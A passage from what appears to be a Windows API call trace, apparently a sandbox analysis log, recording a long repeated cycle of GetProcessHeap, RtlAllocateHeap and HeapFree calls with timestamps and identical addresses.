GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.008] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.008] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.009] GetProcessHeap () returned 0x4f10000 [0061.009] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.010] GetProcessHeap () returned 0x4f10000 [0061.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.011] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.012] GetProcessHeap () returned 0x4f10000 [0061.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.013] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.014] GetProcessHeap () returned 0x4f10000 [0061.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.015] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap 